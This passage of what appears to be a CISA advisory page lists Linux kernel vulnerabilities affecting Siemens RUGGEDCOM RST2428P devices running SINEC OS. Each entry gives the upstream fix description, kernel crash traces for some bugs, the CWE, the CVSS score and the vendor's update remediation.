mlx5_eswitch_disable+0x63/0x90 [mlx5_core] mlx5_unload+0x1d/0x170 [mlx5_core] mlx5_uninit_one+0xa2/0x130 [mlx5_core] remove_one+0x78/0xd0 [mlx5_core] pci_device_remove+0x39/0xa0 device_release_driver_internal+0x194/0x1f0 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x53/0x1f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40251">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40252</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() The loops in 'qede_tpa_cont()' and 'qede_tpa_end()', iterate over 'cqe-&gt;len_list[]' using only a zero-length terminator as the stopping condition. If the terminator was missing or malformed, the loop could run past the end of the fixed-size array. Add an explicit bound check using ARRAY_SIZE() in both loops to prevent a potential out-of-bounds access. Found by Linux Verification Center (linuxtesting.org) with SVACE.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40252">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40254</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: remove never-working support for setting nsh fields The validation of the set(nsh(...)) action is completely wrong. It runs through the nsh_key_put_from_nlattr() function that is the same function that validates NSH keys for the flow match and the push_nsh() action. However, the set(nsh(...)) has a very different memory layout. Nested attributes in there are doubled in size in case of the masked set(). That makes proper validation impossible. There is also confusion in the code between the 'masked' flag, that says that the nested attributes are doubled in size containing both the value and the mask, and the 'is_mask' that says that the value we're parsing is the mask. This is causing kernel crash on trying to write into mask part of the match with SW_FLOW_KEY_PUT() during validation, while validate_nsh() doesn't allocate any memory for it: BUG: kernel NULL pointer dereference, address: 0000000000000018 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary) RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch] Call Trace: validate_nsh+0x60/0x90 [openvswitch] validate_set.constprop.0+0x270/0x3c0 [openvswitch] __ovs_nla_copy_actions+0x477/0x860 [openvswitch] ovs_nla_copy_actions+0x8d/0x100 [openvswitch] ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch] genl_family_rcv_msg_doit+0xdb/0x130 genl_family_rcv_msg+0x14b/0x220 genl_rcv_msg+0x47/0xa0 netlink_rcv_skb+0x53/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x280/0x3b0 netlink_sendmsg+0x1f7/0x430 ____sys_sendmsg+0x36b/0x3a0 ___sys_sendmsg+0x87/0xd0 __sys_sendmsg+0x6d/0xd0 do_syscall_64+0x7b/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The third issue with this process is that while trying to convert the non-masked set into masked one, validate_set() copies and doubles the size of the OVS_KEY_ATTR_NSH as if it didn't have any nested attributes. It should be copying each nested attribute and doubling them in size independently. And the process must be properly reversed during the conversion back from masked to a non-masked variant during the flow dump. In the end, the only two outcomes of trying to use this action are either validation failure or a kernel crash. And if somehow someone manages to install a flow with such an action, it will most definitely not do what it is supposed to, since all the keys and the masks are mixed up. Fixing all the issues is a complex task as it requires re-writing most of the validation code. Given that and the fact that this functionality never worked since introduction, let's just remove it altogether. It's better to re-introduce it later with a proper implementation instead of trying to fix it in stable releases.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40254">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40257</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix a race in mptcp_pm_del_add_timer() mptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, &amp;entry-&gt;add_timer) while another might have free entry already, as reported by syzbot. Add RCU protection to fix this issue. Also change confusing add_timer variable with stop_timer boolean. syzbot report: BUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 Read of size 4 at addr ffff8880311e4150 by task kworker/1:1/44 CPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Workqueue: events mptcp_worker Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631 mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362 mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174 tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361 tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441 tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931 tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374 ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6079 [inline] __netif_receive_skb+0x143/0x380 net/core/dev.c:6192 process_backlog+0x31e/0x900 net/core/dev.c:6544 __napi_poll+0xb6/0x540 net/core/dev.c:7594 napi_poll net/core/dev.c:7657 [inline] net_rx_action+0x5f7/0xda0 net/core/dev.c:7784 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302 mptcp_pm_send_ack net/mptcp/pm.c:210 [inline] mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1 mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 44: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748 kmalloc_noprof include/linux/slab.h:957 [inline] mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385 mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355 mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline] __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529 mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Freed by task 6630: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object m ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40257">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40258</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix race condition in mptcp_schedule_work() syzbot reported use-after-free in mptcp_schedule_work() [1] Issue here is that mptcp_schedule_work() schedules a work, then gets a refcount on sk-&gt;sk_refcnt if the work was scheduled. This refcount will be released by mptcp_worker(). [A] if (schedule_work(...)) { [B] sock_hold(sk); return true; } Problem is that mptcp_worker() can run immediately and complete before [B] We need instead : sock_hold(sk); if (schedule_work(...)) return true; sock_put(sk); [1] refcount_t: addition on 0; use-after-free. WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25 Call Trace: __refcount_add include/linux/refcount.h:-1 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] sock_hold include/net/sock.h:816 [inline] mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943 mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316 call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747 expire_timers kernel/time/timer.c:1798 [inline] __run_timers kernel/time/timer.c:2372 [inline] __run_timer_base+0x648/0x970 kernel/time/timer.c:2384 run_timer_base kernel/time/timer.c:2393 [inline] run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] run_ktimerd+0xcf/0x190 kernel/softirq.c:1138 smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40258">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40261</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure -&gt;ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_assocation() waits for pending I/O to complete before returning, and an error can cause -&gt;ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure -&gt;ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8-&gt;next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff &lt;0f&gt; 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40261">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1341.html">CWE-1341 Multiple Releases of Same Resource or Handle</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40262</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be "priv" but we accidentally pass "&amp;priv" which is an address in the stack and so it will lead to memory corruption when the imx_sc_key_action() function is called. Remove the &amp;.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40262">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40263</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: cros_ec_keyb - fix an invalid memory access If cros_ec_keyb_register_matrix() isn't called (due to `buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-&gt;idev` remains NULL. An invalid memory access is observed in cros_ec_keyb_process() when receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work() in such case. Unable to handle kernel read from unreadable memory at virtual address 0000000000000028 ... x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: input_event cros_ec_keyb_work blocking_notifier_call_chain ec_irq_thread It's still unknown about why the kernel receives such malformed event, in any cases, the kernel shouldn't access `ckdev-&gt;idev` and friends if the driver doesn't intend to initialize them.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40263">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40264</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: be2net: pass wrb_params in case of OS2BMC be_insert_vlan_in_pkt() is called with the wrb_params argument being NULL at be_send_pkt_to_bmc() call site.  This may lead to dereferencing a NULL pointer when processing a workaround for specific packet, as commit bc0c3405abbb ("be2net: fix a Tx stall bug caused by a specific ipv6 packet") states. The correct way would be to pass the wrb_params from be_xmit().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40264">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
